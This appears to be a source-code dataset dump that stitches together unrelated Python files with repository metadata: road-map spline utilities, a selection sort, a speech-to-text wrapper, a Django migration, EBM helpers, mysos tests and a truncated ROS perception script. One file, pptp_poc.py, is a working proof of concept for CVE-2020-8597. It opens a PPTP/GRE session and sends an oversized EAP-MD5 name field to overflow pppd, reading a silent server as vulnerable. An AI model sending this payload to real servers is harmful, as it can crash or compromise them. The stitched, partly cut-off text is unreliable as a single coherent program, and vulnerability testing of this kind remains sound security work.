            if connection.from_id == lane_id and connection.connection_type == "Continue":
                connection.from_id = new_lane.id
        connection = ConnectLanes(open_map, lane.id, new_lane.id, "Continue")
        if connection is not None:
            new_lane.lane_connections.add(connection.id)
            lane.lane_connections.add(connection.id)
        segment.lanes.remove(lane.id)
        segment.lanes.append(new_lane.id)
        old_id, new_id = SplitSplineCurve(open_map, lane.centerline, curve_idx.i, curve_idx.t)
        new_lane.centerline = new_id
def SplitBoundary(open_map, segment_id, boundary_id, curve_idx):
    """Split a boundary's curve at curve_idx; the tail becomes a new Boundary
    of the same type attached to the same road segment."""
    boundary = open_map.boundaries[boundary_id]
    segment = open_map.road_segments[segment_id]
    if boundary_id not in segment.boundaries:
        return
    # Split the underlying spline; the tail curve id backs the new boundary.
    _, tail_curve_id = SplitSplineCurve(open_map, boundary.curve, curve_idx.i, curve_idx.t)
    tail_boundary = NewBoundary(open_map,
                                boundary_type=boundary.boundary_type,
                                curve_id=tail_curve_id)
    segment.boundaries.remove(boundary.id)
    segment.boundaries.add(tail_boundary.id)
def SplitRefLine(open_map, segment_id, curve_idx):
    """Split a road segment's reference line at curve_idx; the segment keeps
    the tail half as its refline (the head keeps the old curve id)."""
    segment = open_map.road_segments[segment_id]
    _, tail_id = SplitSplineCurve(open_map, segment.refline, curve_idx.i, curve_idx.t)
    segment.refline = tail_id
| 7,783
| -5
| 424
|
eace333492baab89237ac78a14843235cda31067
| 316
|
py
|
Python
|
lab_session/selection_sort.py
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
[
"MIT"
] | 1
|
2021-05-13T13:10:42.000Z
|
2021-05-13T13:10:42.000Z
|
lab_session/selection_sort.py
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
[
"MIT"
] | null | null | null |
lab_session/selection_sort.py
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
[
"MIT"
] | null | null | null |
values = [6, 5, 3, 1, 8, 7, 2, 4]
print (values)
values = selection_sort(values)
| 18.588235
| 46
| 0.594937
|
def selection_sort(value):
    """In-place selection sort; prints the list after each outer pass and
    returns the (same, now sorted) list."""
    size = len(value)
    for pos in range(size - 1):
        # Find the index of the smallest remaining element.
        smallest = pos
        for cand in range(pos + 1, size):
            if value[cand] < value[smallest]:
                smallest = cand
        if smallest != pos:
            value[pos], value[smallest] = value[smallest], value[pos]
        print(value)
    return value
values = [6, 5, 3, 1, 8, 7, 2, 4]
print (values)
values = selection_sort(values)
| 212
| 0
| 22
|
46b5d19814074de733b953d95c57c5868b1bb95b
| 7,026
|
py
|
Python
|
cve-2020-8597-pptpd/pptp_poc.py
|
reidmefirst/PoC-Exploits
|
3b8f845774a9a6474fed86264443779a8f85e71a
|
[
"BSD-3-Clause"
] | 3
|
2020-06-02T14:39:17.000Z
|
2021-04-23T16:34:08.000Z
|
cve-2020-8597-pptpd/pptp_poc.py
|
reidmefirst/PoC-Exploits
|
3b8f845774a9a6474fed86264443779a8f85e71a
|
[
"BSD-3-Clause"
] | null | null | null |
cve-2020-8597-pptpd/pptp_poc.py
|
reidmefirst/PoC-Exploits
|
3b8f845774a9a6474fed86264443779a8f85e71a
|
[
"BSD-3-Clause"
] | 1
|
2020-06-12T17:39:21.000Z
|
2020-06-12T17:39:21.000Z
|
#!/usr/bin/python3
from scapy.all import *
import socket
import sys
import signal
import os
conf_ack_received = False
conf_ack_sent = False
debug = False
if os.environ.get("DEBUG"):
debug = True
if len(sys.argv) < 2:
print("Usage %s PPTP_Server to test for CVE-2020-8597" %(sys.argv[0]));
sys.exit(0)
dst = sys.argv[1]
#default pptp port
dport = 1723
print("Initiating communications with PPTP server %s " %(dst))
signal.signal(signal.SIGALRM, handler)
#6 seconds for first TCP response
signal.alarm(6)
#TCP communications
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((dst, dport))
cstream = StreamSocket(client)
# initialize PPTP session
call_id = random.randint(1000,10000)
vr=PPTPStartControlConnectionRequest(vendor_string="cananian")
#This is due to a bug in PPTPStartControlConnectionRequest in scapy where version and
#revision is not properly parsed
vr.protocol_version=256
cstream.sr1(vr,verbose=debug)
call_reply = cstream.sr1(PPTPOutgoingCallRequest(call_id=call_id),verbose=debug)
call_reply = PPTPOutgoingCallReply(call_reply)
signal.alarm(0)
#Another 6 seconds to do GRE connection
signal.alarm(6)
# GRE communications
gre_socket = socket.socket(socket.AF_INET,socket.SOCK_RAW, socket.IPPROTO_GRE)
gre_socket.connect((dst,dport))
gre_stream = SimpleSocket(gre_socket)
#send configuration request
server_conf_request = gre_stream.sr1(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id)/
HDLC()/PPP()/
PPP_LCP_Configure(id=0x1,options=[
PPP_LCP_Magic_Number_Option(magic_number=0xaabbccdd) ]),verbose=debug)
server_conf_request = IP(server_conf_request)
signal.alarm(0)
# give 9 seconds for configure ack to complete
signal.alarm(9)
tries = 0
try:
while conf_ack_received == False or tries < 9:
sniff(iface="eth0",prn=pkt_callback,count=1,filter='proto gre and src host '+sys.argv[1],store=0)
tries = tries + 1
except:
if debug:
print("Never could recevie a configureation ack from peer due to Timeout")
tries = 9
if conf_ack_received == False and tries > 8:
print("Remote system %s did not provide Configure-Acknowledgement - giving up" %(sys.argv[1]))
print("Server %s is in UNKNOWN state" %(sys.argv[1]))
sys.exit(0)
signal.alarm(0)
print("Connected to PPTP server, now sending large buffer to peer to attempt buffer overflow")
bad_pkt=GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+1)/PPP(proto=0xc227)/EAP_MD5(code=1,value_size=16,value='A'*16, optional_name='A'*1100)
gre_stream.send(bad_pkt)
#Look to see if we receive EAP_Nak that means buffer overflow did NOT succeed
signal.alarm(3)
try:
sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Server %s is likely vulnerable, did not return anything after EAP packet " % (sys.argv[1]))
sys.exit(0)
print("Server %s is likely NOT vulnerable to buffer overflow" % (sys.argv[1]))
signal.alarm(0)
print("Verifying peer %s one more time using a Echo request to the peer " % (sys.argv[1]))
signal.alarm(3)
#echo request to test if PPP interface is still alive - that means we didnt crash the remote
#pptp server with the bad payload
gre_stream.send(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+2)/
HDLC()/PPP()/
PPP_LCP_Configure(code=0x9,id=4))
try:
PPP_Alive = sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Did not received PPP Echo Reply, check the logs on the server to verify status")
sys.exit(0)
print("Received a normal PPP Echo Reply, System is mostly likely NOT vulnerable")
sys.exit(0)
| 42.325301
| 212
| 0.609735
|
#!/usr/bin/python3
from scapy.all import *
import socket
import sys
import signal
import os
conf_ack_received = False
conf_ack_sent = False
debug = False
if os.environ.get("DEBUG"):
debug = True
def pkt_callback(pkt):
    """Scapy sniff callback driving the LCP/EAP handshake state machine.

    Inspects each GRE packet from the target, tracks Configure-Ack progress
    via module globals, answers the peer's Configure-Requests, and exits the
    process whenever a packet proves the server is still healthy (i.e. NOT
    vulnerable).  May recurse into sniff() to keep consuming packets.
    """
    global gre_stream, server_conf_request, call_reply, conf_ack_received, conf_ack_sent, debug
    if debug:
        print("Received a GRE packet that shows continued conversation for EAP")
        pkt.show()
    if pkt.haslayer(PPP):
        if pkt.getlayer(PPP).proto == 49699 : # CHAP 0xc223
            # A CHAP challenge implies LCP negotiation already completed.
            conf_ack_received = True
            if debug:
                print("Received a CHAP challenge from peer ignoring")
                print("Assuming we received a Conf-Ack already")
            return
    if pkt.haslayer(EAP):
        if pkt.getlayer(EAP).code == 2 :
            #EAP Response received for the sent EAP request with bad payload
            if pkt.getlayer(EAP).type == 3: # If EAP-NaK recevied assume server is ok
                print("Server %s is likely NOT vulnerable " % (sys.argv[1]))
                sys.exit(0)
    if pkt.haslayer(PPP_LCP_Configure) :
        p_layer = pkt.getlayer(PPP_LCP_Configure)
        cid = p_layer.id
        if p_layer.code == 2:
            # Configure-Ack: our configuration was accepted.
            if debug:
                print("Received Conf ack we are all okay")
            conf_ack_received = True
            if conf_ack_sent == True:
                return
            else:
                # Keep sniffing until we have also acked the peer's request.
                sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
        if p_layer.code == 1: #config request
            if debug:
                print("Received another Config-Request, should reply this")
                pkt.show()
            # Echo the peer's options straight back as a Configure-Ack.
            server_conf_ack = gre_stream.sr1(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+1)/
                HDLC()/PPP()/
                PPP_LCP_Configure(code=0x2,id=cid,options=pkt[IP][GRE_PPTP][PPP][PPP_LCP_Configure].options), verbose=debug)
            conf_ack_sent = True
            if conf_ack_received:
                sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
        if p_layer.code == 10 and p_layer.id == 4: # Echo-reply with id=1
            # Echo-Reply to our post-exploit ping: the server survived the payload.
            if debug:
                print("We received a Echo-Reply back for ID=4 ping request")
            print("Server %s is likely NOT vulnerable " % (sys.argv[1]))
            sys.exit(0)
def handler(signum, frame):
    """SIGALRM handler: raise so the blocking socket/sniff calls can time out."""
    if debug:
        print("Timeout has expired")
    raise Exception('Timed out')
if len(sys.argv) < 2:
print("Usage %s PPTP_Server to test for CVE-2020-8597" %(sys.argv[0]));
sys.exit(0)
dst = sys.argv[1]
#default pptp port
dport = 1723
print("Initiating communications with PPTP server %s " %(dst))
signal.signal(signal.SIGALRM, handler)
#6 seconds for first TCP response
signal.alarm(6)
#TCP communications
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((dst, dport))
cstream = StreamSocket(client)
# initialize PPTP session
call_id = random.randint(1000,10000)
vr=PPTPStartControlConnectionRequest(vendor_string="cananian")
#This is due to a bug in PPTPStartControlConnectionRequest in scapy where version and
#revision is not properly parsed
vr.protocol_version=256
cstream.sr1(vr,verbose=debug)
call_reply = cstream.sr1(PPTPOutgoingCallRequest(call_id=call_id),verbose=debug)
call_reply = PPTPOutgoingCallReply(call_reply)
signal.alarm(0)
#Another 6 seconds to do GRE connection
signal.alarm(6)
# GRE communications
gre_socket = socket.socket(socket.AF_INET,socket.SOCK_RAW, socket.IPPROTO_GRE)
gre_socket.connect((dst,dport))
gre_stream = SimpleSocket(gre_socket)
#send configuration request
server_conf_request = gre_stream.sr1(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id)/
HDLC()/PPP()/
PPP_LCP_Configure(id=0x1,options=[
PPP_LCP_Magic_Number_Option(magic_number=0xaabbccdd) ]),verbose=debug)
server_conf_request = IP(server_conf_request)
signal.alarm(0)
# give 9 seconds for configure ack to complete
signal.alarm(9)
tries = 0
try:
while conf_ack_received == False or tries < 9:
sniff(iface="eth0",prn=pkt_callback,count=1,filter='proto gre and src host '+sys.argv[1],store=0)
tries = tries + 1
except:
if debug:
print("Never could recevie a configureation ack from peer due to Timeout")
tries = 9
if conf_ack_received == False and tries > 8:
print("Remote system %s did not provide Configure-Acknowledgement - giving up" %(sys.argv[1]))
print("Server %s is in UNKNOWN state" %(sys.argv[1]))
sys.exit(0)
signal.alarm(0)
print("Connected to PPTP server, now sending large buffer to peer to attempt buffer overflow")
bad_pkt=GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+1)/PPP(proto=0xc227)/EAP_MD5(code=1,value_size=16,value='A'*16, optional_name='A'*1100)
gre_stream.send(bad_pkt)
#Look to see if we receive EAP_Nak that means buffer overflow did NOT succeed
signal.alarm(3)
try:
sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Server %s is likely vulnerable, did not return anything after EAP packet " % (sys.argv[1]))
sys.exit(0)
print("Server %s is likely NOT vulnerable to buffer overflow" % (sys.argv[1]))
signal.alarm(0)
print("Verifying peer %s one more time using a Echo request to the peer " % (sys.argv[1]))
signal.alarm(3)
#echo request to test if PPP interface is still alive - that means we didnt crash the remote
#pptp server with the bad payload
gre_stream.send(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+2)/
HDLC()/PPP()/
PPP_LCP_Configure(code=0x9,id=4))
try:
PPP_Alive = sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Did not received PPP Echo Reply, check the logs on the server to verify status")
sys.exit(0)
print("Received a normal PPP Echo Reply, System is mostly likely NOT vulnerable")
sys.exit(0)
| 3,009
| 0
| 70
|
b7423732828a1ec172d11cc4ed16d8387b7ac8e6
| 676
|
py
|
Python
|
speech_to_text.py
|
TheMatildaProject/auditory-cortex
|
72edf7e90fad238ce3705f0ce8307ce946fc50c1
|
[
"MIT"
] | null | null | null |
speech_to_text.py
|
TheMatildaProject/auditory-cortex
|
72edf7e90fad238ce3705f0ce8307ce946fc50c1
|
[
"MIT"
] | null | null | null |
speech_to_text.py
|
TheMatildaProject/auditory-cortex
|
72edf7e90fad238ce3705f0ce8307ce946fc50c1
|
[
"MIT"
] | null | null | null |
#import speech_recognition as sr
import wave
import io
import io, os
from google.auth import environment_vars
from google.cloud import speech
| 28.166667
| 51
| 0.64497
|
#import speech_recognition as sr
import wave
import io
import io, os
from google.auth import environment_vars
from google.cloud import speech
class SpeechToText(object):
    """Transcribe a raw audio buffer via the (legacy) google.cloud.speech client."""

    def __init__(self, audio):
        # Raw audio bytes to transcribe (LINEAR16 encoding assumed).
        self._audio = audio
        self._speech_client = speech.Client()

    def getFromGoogle(self):
        """Return the transcript of the first recognition alternative (en-UK),
        or None when the service returns no alternatives."""
        with io.BytesIO(self._audio) as audio_file:
            content = audio_file.read()
        sample = self._speech_client.sample(
            content,
            source_uri=None,
            encoding='LINEAR16')
        for alternative in sample.recognize('en-UK'):
            return alternative.transcript
| 452
| 6
| 77
|
a851d9c85ce569c52aa4249c5fc22470cd0186ca
| 559
|
py
|
Python
|
cafeapp/migrations/0019_auto_20211208_1241.py
|
giranezafiacre/fabcafe-api
|
d4cd3e6b291c5b071c8c70c5deaac06f0182a664
|
[
"MIT"
] | null | null | null |
cafeapp/migrations/0019_auto_20211208_1241.py
|
giranezafiacre/fabcafe-api
|
d4cd3e6b291c5b071c8c70c5deaac06f0182a664
|
[
"MIT"
] | null | null | null |
cafeapp/migrations/0019_auto_20211208_1241.py
|
giranezafiacre/fabcafe-api
|
d4cd3e6b291c5b071c8c70c5deaac06f0182a664
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-12-08 10:41
import datetime
from django.db import migrations, models
| 23.291667
| 99
| 0.592129
|
# Generated by Django 3.2.9 on 2021-12-08 10:41
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drops User.email and alters Order.order_time_date's default.

    NOTE(review): the default below is a *fixed* timestamp captured when the
    migration was auto-generated, not "now" at insert time -- the model field
    likely wants django.utils.timezone.now instead.
    """

    dependencies = [
        ('cafeapp', '0018_auto_20211208_1228'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='user',
            name='email',
        ),
        migrations.AlterField(
            model_name='order',
            name='order_time_date',
            field=models.DateTimeField(default=datetime.datetime(2021, 12, 8, 12, 41, 23, 362870)),
        ),
    ]
| 0
| 429
| 23
|
b95fa9041a7cb8d7c72117a7a576a5a8c358e96d
| 4,006
|
py
|
Python
|
src/python/interpret/glassbox/ebm/utils.py
|
benediktwagner/interpret
|
a80e42fbaad7c25f4447b6f81137c53714eed710
|
[
"MIT"
] | 2
|
2019-05-19T04:48:52.000Z
|
2019-05-25T14:50:48.000Z
|
src/python/interpret/glassbox/ebm/utils.py
|
benediktwagner/interpret
|
a80e42fbaad7c25f4447b6f81137c53714eed710
|
[
"MIT"
] | null | null | null |
src/python/interpret/glassbox/ebm/utils.py
|
benediktwagner/interpret
|
a80e42fbaad7c25f4447b6f81137c53714eed710
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
# TODO: Test EBMUtils
from sklearn.utils.extmath import softmax
import numpy as np
import logging
log = logging.getLogger(__name__)
# TODO: Clean up
| 32.306452
| 84
| 0.628308
|
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
# TODO: Test EBMUtils
from sklearn.utils.extmath import softmax
import numpy as np
import logging
log = logging.getLogger(__name__)
# TODO: Clean up
class EBMUtils:
    """Static helpers for building and evaluating EBM attribute-set models.

    All methods are stateless; `skip_attr_set_idxs` defaults were changed
    from `[]` to `None` to avoid the shared-mutable-default pitfall
    (behaviorally identical: the lists were never mutated).
    """

    @staticmethod
    def gen_attributes(col_types, col_n_bins):
        """Create the Python-side attribute descriptors (undocumented format).

        `col_types` sets only the count: ordinal handling lives in native
        code, so every attribute is emitted as "continuous" and missing-value
        support is disabled.
        """
        return [
            {
                # NOTE: Ordinal only handled at native, override.
                "type": "continuous",
                # NOTE: Missing not implemented at native, always set to false.
                "has_missing": False,
                "n_bins": col_n_bins[col_idx],
            }
            for col_idx in range(len(col_types))
        ]

    @staticmethod
    def gen_attribute_sets(attribute_indices):
        """Wrap each list of column indices in an attribute-set record."""
        return [
            {"n_attributes": len(indices), "attributes": indices}
            for indices in attribute_indices
        ]

    @staticmethod
    def scores_by_attrib_set(
        X, attribute_sets, attribute_set_models, skip_attr_set_idxs=None
    ):
        """Yield (set_idx, attribute_set, per-instance scores) for each set.

        X must already be discretized: its columns are bin indices used to
        fancy-index each set's score tensor, one index vector per dimension.
        """
        if skip_attr_set_idxs is None:
            skip_attr_set_idxs = []
        for set_idx, attribute_set in enumerate(attribute_sets):
            if set_idx in skip_attr_set_idxs:
                continue
            tensor = attribute_set_models[set_idx]
            # Get the current column(s) to process
            attr_idxs = attribute_set["attributes"]
            sliced_X = X[:, attr_idxs]
            scores = tensor[tuple(sliced_X.T)]
            yield set_idx, attribute_set, scores

    @staticmethod
    def decision_function(
        X, attribute_sets, attribute_set_models, intercept, skip_attr_set_idxs=None
    ):
        """Per-instance additive score (log odds): intercept + sum of set scores.

        Raises Exception when any resulting score is non-finite.
        """
        if skip_attr_set_idxs is None:
            skip_attr_set_idxs = []
        if X.ndim == 1:
            X = X.reshape(1, X.shape[0])
        # Foreach attribute set, add its per-instance contribution.
        score_vector = np.zeros(X.shape[0])
        score_vector += intercept
        scores_gen = EBMUtils.scores_by_attrib_set(
            X, attribute_sets, attribute_set_models, skip_attr_set_idxs
        )
        for _, _, scores in scores_gen:
            score_vector += scores
        if not np.all(np.isfinite(score_vector)):  # pragma: no cover
            msg = "Non-finite values present in log odds vector."
            log.error(msg)
            raise Exception(msg)
        return score_vector

    @staticmethod
    def classifier_predict_proba(X, estimator, skip_attr_set_idxs=None):
        """Binary class probabilities via softmax over [-log_odds, +log_odds]."""
        log_odds_vector = EBMUtils.decision_function(
            X,
            estimator.attribute_sets_,
            estimator.attribute_set_models_,
            estimator.intercept_,
            skip_attr_set_idxs,
        )
        log_odds_trans = np.c_[-log_odds_vector, log_odds_vector]
        return softmax(log_odds_trans, copy=True)

    @staticmethod
    def classifier_predict(X, estimator, skip_attr_set_idxs=None):
        """Predicted class labels: argmax over the class probabilities."""
        scores = EBMUtils.classifier_predict_proba(X, estimator, skip_attr_set_idxs)
        return estimator.classes_[np.argmax(scores, axis=1)]

    @staticmethod
    def regressor_predict(X, estimator, skip_attr_set_idxs=None):
        """Regression predictions: the raw additive score."""
        return EBMUtils.decision_function(
            X,
            estimator.attribute_sets_,
            estimator.attribute_set_models_,
            estimator.intercept_,
            skip_attr_set_idxs,
        )

    @staticmethod
    def gen_feature_name(attr_idxs, col_names):
        """Human-readable name: column names joined by ' x ' for interactions."""
        return " x ".join(col_names[attribute_index] for attribute_index in attr_idxs)

    @staticmethod
    def gen_feature_type(attr_idxs, col_types):
        """Singleton sets keep the column's type; interactions are 'pairwise'."""
        if len(attr_idxs) == 1:
            return col_types[attr_idxs[0]]
        return "pairwise"
| 3,344
| 398
| 22
|
c980129dfcca46c379ea366aa1fa15eee1b01ac4
| 187
|
py
|
Python
|
rdm/project_management/__init__.py
|
dheater/rdm
|
3e16b808cdcaa7860767fe99cd66997adc803c35
|
[
"MIT"
] | 76
|
2018-05-09T09:53:18.000Z
|
2022-03-21T11:55:18.000Z
|
rdm/project_management/__init__.py
|
dheater/rdm
|
3e16b808cdcaa7860767fe99cd66997adc803c35
|
[
"MIT"
] | 68
|
2018-03-24T10:03:09.000Z
|
2022-01-19T20:52:36.000Z
|
rdm/project_management/__init__.py
|
dheater/rdm
|
3e16b808cdcaa7860767fe99cd66997adc803c35
|
[
"MIT"
] | 24
|
2018-06-21T19:52:58.000Z
|
2022-03-29T13:15:15.000Z
|
from .base import BaseBackend
from .github import GitHubIssueBackend, GitHubPullRequestBackend
__all__ = [
'BaseBackend',
'GitHubIssueBackend',
'GitHubPullRequestBackend',
]
| 20.777778
| 64
| 0.764706
|
from .base import BaseBackend
from .github import GitHubIssueBackend, GitHubPullRequestBackend
__all__ = [
'BaseBackend',
'GitHubIssueBackend',
'GitHubPullRequestBackend',
]
| 0
| 0
| 0
|
311d97d31b1653b39c0e6b386a057ec53766cdaa
| 6,030
|
py
|
Python
|
tests/executor/test_mysos_task_runner.py
|
programwithebay/ApacheMysos
|
f4f7e459a51e957eeeef989b3ecdaac29393fa45
|
[
"Apache-2.0"
] | 1
|
2017-02-15T05:37:59.000Z
|
2017-02-15T05:37:59.000Z
|
tests/executor/test_mysos_task_runner.py
|
benley/mysos
|
9c19f28eb7926002005e276ef8cabf24c7fe2edd
|
[
"Apache-2.0"
] | null | null | null |
tests/executor/test_mysos_task_runner.py
|
benley/mysos
|
9c19f28eb7926002005e276ef8cabf24c7fe2edd
|
[
"Apache-2.0"
] | null | null | null |
import os
import signal
import unittest
from mysos.common.cluster import ClusterManager
from mysos.common.testing import Fake
from mysos.executor.noop_installer import NoopPackageInstaller
from mysos.executor.mysos_task_runner import MysosTaskRunner
from mysos.executor.task_runner import TaskError
from mysos.executor.testing.fake import FakeTaskControl
from kazoo.handlers.threading import SequentialThreadingHandler
import pytest
from twitter.common.concurrent import deadline
from twitter.common.quantity import Amount, Time
from twitter.common.zookeeper.serverset.endpoint import Endpoint, ServiceInstance
from zake.fake_client import FakeClient
from zake.fake_storage import FakeStorage
if 'MYSOS_DEBUG' in os.environ:
from twitter.common import log
from twitter.common.log.options import LogOptions
LogOptions.set_stderr_log_level('google:DEBUG')
LogOptions.set_simple(True)
log.init('mysos_tests')
| 28.990385
| 89
| 0.702819
|
import os
import signal
import unittest
from mysos.common.cluster import ClusterManager
from mysos.common.testing import Fake
from mysos.executor.noop_installer import NoopPackageInstaller
from mysos.executor.mysos_task_runner import MysosTaskRunner
from mysos.executor.task_runner import TaskError
from mysos.executor.testing.fake import FakeTaskControl
from kazoo.handlers.threading import SequentialThreadingHandler
import pytest
from twitter.common.concurrent import deadline
from twitter.common.quantity import Amount, Time
from twitter.common.zookeeper.serverset.endpoint import Endpoint, ServiceInstance
from zake.fake_client import FakeClient
from zake.fake_storage import FakeStorage
if 'MYSOS_DEBUG' in os.environ:
from twitter.common import log
from twitter.common.log.options import LogOptions
LogOptions.set_stderr_log_level('google:DEBUG')
LogOptions.set_simple(True)
log.init('mysos_tests')
class FakeStateManager(Fake): pass
class TestTaskRunner(unittest.TestCase):
def setUp(self):
self._storage = FakeStorage(SequentialThreadingHandler())
self._client = FakeClient(storage=self._storage)
self._client.start()
self._self_instance = ServiceInstance(Endpoint("host", 10000))
self._state_manager = FakeStateManager()
def tearDown(self):
self._client.stop()
def test_stop(self):
task_control = FakeTaskControl()
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
runner.start()
assert runner.stop()
# Killed by SIGTERM.
assert deadline(runner.join, Amount(1, Time.SECONDS)) == -signal.SIGTERM
def test_demote(self):
task_control = FakeTaskControl()
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
manager = ClusterManager(self._client, "/home/test/my_cluster")
runner.start()
self_member = manager.add_member(self._self_instance)
# 'self_instance' becomes the master.
manager.promote_member(self_member)
runner.promoted.wait(1)
another_member = manager.add_member(ServiceInstance(Endpoint("another_host", 10000)))
# This demotes 'self_instance', which should cause runner to stop.
manager.promote_member(another_member)
assert deadline(runner.join, Amount(1, Time.SECONDS))
def test_reparent(self):
task_control = FakeTaskControl()
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
manager = ClusterManager(self._client, "/home/test/my_cluster")
runner.start()
# Promote another instance.
master = ServiceInstance(Endpoint("another_host", 10000))
another_member = manager.add_member(master)
manager.promote_member(another_member)
assert runner.master.get(True, 1) == master
assert runner.stop()
assert deadline(runner.join, Amount(1, Time.SECONDS))
def test_mysqld_error(self):
task_control = FakeTaskControl(mysqld="exit 123")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
runner.start()
assert deadline(runner.join, Amount(1, Time.SECONDS)) == 123
def test_start_command_error(self):
task_control = FakeTaskControl(start_cmd="exit 1")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
with pytest.raises(TaskError) as e:
runner.start()
assert e.value.message.startswith("Failed to start MySQL task")
def test_promote_command_error(self):
task_control = FakeTaskControl(promote_cmd="exit 1")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
manager = ClusterManager(self._client, "/home/test/my_cluster")
runner.start()
self_member = manager.add_member(self._self_instance)
# 'self_instance' becomes the master.
manager.promote_member(self_member)
runner.promoted.wait(1)
with pytest.raises(TaskError) as e:
runner.join()
assert e.value.message.startswith("Failed to promote the slave")
def test_get_log_position(self):
task_control = FakeTaskControl(position=1)
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
runner.start()
assert runner.get_log_position() == 1
def test_get_log_position_error(self):
task_control = FakeTaskControl(get_log_position_cmd="exit 1")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
with pytest.raises(TaskError) as e:
runner.get_log_position()
assert (e.value.message ==
"Unable to get the slave's log position: " +
"Command 'exit 1' returned non-zero exit status 1")
def test_stop_interminable(self):
cmd = """trap "echo Trapped SIGTERM!" TERM
while :
do
sleep 60
done
"""
task_control = FakeTaskControl(mysqld=cmd)
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
task_control._mysqld = cmd
runner.start()
assert runner.stop(timeout=1)
assert deadline(runner.join, Amount(1, Time.SECONDS)) == -signal.SIGKILL
| 4,756
| 32
| 320
|
a19e61972ecebe175f1b7437fdeac191ee97b06e
| 8,437
|
py
|
Python
|
scripts/object_recognition.py
|
SerenaXue/3D-Perception-Target-Identification
|
df1dfa8a2132c6fa90a9e8def636b65d9344ba9d
|
[
"MIT"
] | null | null | null |
scripts/object_recognition.py
|
SerenaXue/3D-Perception-Target-Identification
|
df1dfa8a2132c6fa90a9e8def636b65d9344ba9d
|
[
"MIT"
] | null | null | null |
scripts/object_recognition.py
|
SerenaXue/3D-Perception-Target-Identification
|
df1dfa8a2132c6fa90a9e8def636b65d9344ba9d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import numpy as np
import sklearn
from sklearn.preprocessing import LabelEncoder
import pickle
from sensor_stick.srv import GetNormals
from sensor_stick.features import compute_color_histograms
from sensor_stick.features import compute_normal_histograms
from visualization_msgs.msg import Marker
from sensor_stick.marker_tools import *
from sensor_stick.msg import DetectedObjectsArray
from sensor_stick.msg import DetectedObject
from sensor_stick.pcl_helper import *
# Voxel Grid filter
# PassThrough filter
# RANSAC plane segmentation
# Extract inliers/outliers
# Outlier Removal Filter
# Euclidean Clustering (perform a DBSCAN cluster search)
# Callback function for your Point Cloud Subscriber
if __name__ == '__main__':
# TODO: ROS node initialization
rospy.init_node('clustering', anonymous=True)
# TODO: Create Subscribers
pcl_sub = rospy.Subscriber("/sensor_stick/point_cloud", pc2.PointCloud2, pcl_callback, queue_size=1)
# TODO: Create Publishers
pcl_objects_pub = rospy.Publisher("/pcl_objects", PointCloud2, queue_size=1)
pcl_table_pub = rospy.Publisher("/pcl_table", PointCloud2, queue_size=1)
pcl_cluster_pub = rospy.Publisher("pcl_cluster", PointCloud2, queue_size=1)
# Create Publishers
# TODO: here you need to create two publishers
# Call them object_markers_pub and detected_objects_pub
# Have them publish to "/object_markers" and "/detected_objects" with
# Message Types "Marker" and "DetectedObjectsArray" , respectively
object_markers_pub = rospy.Publisher("/object_markers", Marker, queue_size=1)
detected_objects_pub = rospy.Publisher("/detected_objects", DetectedObjectsArray, queue_size=1)
# TODO: Load Model From disk
model = pickle.load(open('model.sav', 'rb'))
clf = model['classifier']
encoder = LabelEncoder()
encoder.classes_ = model['classes']
scaler = model['scaler']
# Initialize color_list
get_color_list.color_list = []
# TODO: Spin while node is not shutdown
while not rospy.is_shutdown():
